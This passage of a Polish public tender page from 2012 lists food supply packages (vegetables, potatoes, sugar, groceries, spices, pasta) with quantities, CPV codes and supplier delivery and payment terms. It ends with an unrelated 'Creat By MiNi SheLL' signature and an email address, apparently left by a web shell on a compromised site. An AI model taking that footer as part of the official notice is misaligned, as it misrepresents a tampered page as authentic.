kg, 612, 12. Koper ogrodowy, pęczek szt 348, 13. Marchew korzeń kg 2640, 14. Ogórek kwaszony kg 496, 15. Pieczarki świeże kg 324, 16. Pietruszka liście, pęczek
szt 100, 17.Pietruszka korzeń kg 760, 18. Seler korzeń kg 388, 19. Suszone grzyby, klasa I, kg, 6
Oświadczamy, że:
- Zrealizujemy każdorazowo zamówienie w terminie 24 godz. od czasu złożenia zamówienia, własnym transportem, na własny koszt
- Termin płatności: 21 dni
- Towar dostarczymy we wskazane miejsce przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet X- ZIEMNIAKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zamówienia oferujemy dostawę niżej zamówionego towaru: ZIEMNIAKI 
1. Ziemniaki klasa I kg 4048 
Oświadczamy, że:
- Zrealizujemy każdorazowo zamówienie w terminie 24 godz. od czasu złożenia zamówienia, własnym transportem, na własny koszt
- Termin płatności: do 21 dni od daty otrzymania faktury
- Towar dostarczymy we wskazane miejsce przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet XI- CUKIER.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zamówienia oferujemy dostawę niżej zamówionego towaru: Cukier kg 50 
Oświadczamy, że:
- Zrealizujemy każdorazowo zamówienie w terminie 24 godz. od czasu złożenia zamówienia, własnym transportem, na własny koszt
- Termin płatności: do 21 dni od daty otrzymania faktury przez Zamawiającego
- Towar dostarczymy we wskazane miejsce przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet XII- POZOSTAŁE ART. SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zamówienia oferujemy dostawę niżej zamówionego towaru: POZOSTAŁE ART. SPOŻYWCZE: 1. Baton musli. Produkowany z naturalnych składników ( suszone owoce, ziarna sezamu, ziarna słonecznika, orzech, migdały, płatki owsiane ) z dodatkiem polewy jogurtowej. Waga : 30 g - 35 g szt 3200, 2. Groszek zielony konserwowy kg 32, 3. Kukurydza konserwowa kg 80, 4. Koncentrat barszczu czerwonego 200, 5. Koncentrat ogórkowy kg 112, 6. Koncentrat koperkowy kg 112, 7. Majonez domowy z olejem rzepakowym l 48, 8. Ocet spirytusowy 10 %, l, 10, 9. Olej słonecznikowy, l, 85, 10. Olej rzepakowy l 700, 11. Syrop owocowy malina, malina z żurawiną, truskawka, wiśnia, brzoskwinia, pomarańcza, l, 840, 12. Woda mineralna niegazowana, opakowanie 1,5 l, l, 8400 
Oświadczamy, że:
- Zrealizujemy każdorazowo zamówienie w terminie 24 godz. od czasu złożenia zamówienia, własnym transportem, na własny koszt
- Termin płatności: do 21 dni od daty otrzymania faktury przez 
- Towar dostarczymy we wskazane miejsce przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet XIII- PRZYPRAWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zamówienia oferujemy dostawę niżej zamówionego towaru: PRZYPRAWY, 1.
Czosnek granulowany , opakowanie 0,5 kg, szt., 24, 2. Kminek suszony,  opakowanie 0,25 kg szt 8, 3. Liść laurowy, opakowanie 0,25 kg szt 8, 4. Majeranek, opakowanie 0,25 kg szt 16, 5. Papryka słodka mielona, opakowanie 0,5 kg, szt, 24, 6. Pieprz czarny mielony, opakowanie 0,5 kg, szt, 32, 7. Przyprawa do drobiu, opakowanie 0,6 kg, szt, 80, 8. Przyprawa do mięs, opakowanie 0,7 kg, szt, 24, 9. Przyprawa do ryb, opakowanie 0,6 kg, szt, 24, 10. Przyprawa w płynie, opakowanie 6 kg szt 4. 11. Przyprawa warzywna, opakowanie 5 kg szt 32, 12. Ziele angielskie, opakowanie 0,35 kg szt 12, 13. Zioła prowansalskie, opakowanie 0,5 kg szt 8, 14. Rosół z kury, opakowanie 12,5 kg szt 4, 15. Sos sałatkowy ogrodowy, opakowanie   0,7 kg
szt, 32, 16. Sos do spaghetti Napoli, opakowanie 0,9 kg, szt, 48, 17. Sos pieczarkowo - borowikowy, opakowanie 1 kg, szt, 16, 18. Sos pieczeniowy, opakowanie 3 kg, szt, 4, 19. Zupa kalafiorowa, opakowanie 3 kg, szt, 12, 20. Zupa pieczarkowa, opakowanie 3 kg, szt, 12, 21. Koncentrat pomidorowy 30%, opakowanie 4,5 kg, szt, 50, 
Oświadczamy, że:
- Zrealizujemy każdorazowo zamówienie w terminie 24 godz. od czasu złożenia zamówienia, własnym transportem, na własny koszt
- Termin płatności: do 21 dni od daty otrzymania faktury przez zamawiającego
- Towar dostarczymy we wskazane miejsce przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet XIV- MAKARONY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zamówienia oferujemy dostawę niżej zamówionego towaru: MAKARONY
1. Makaron nitka 5 - jajeczny, kg, 72, 2. Makaron gwiazdki dwujajeczny, kg, 96, 
3. Makaron łazanki dwujajeczny, kg, 48, 4.Makaron spaghetti dwujajeczny, kg, 192 
Oświadczamy, że:
- Zrealizujemy każdorazowo zamówienie w terminie 24 godz. od czasu złożenia zamówienia, własnym transportem, na własny koszt
- Termin płatności: do 21 dni od daty otrzymania faktury przez Zamawiającego
- Towar dostarczymy we wskazane miejsce przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com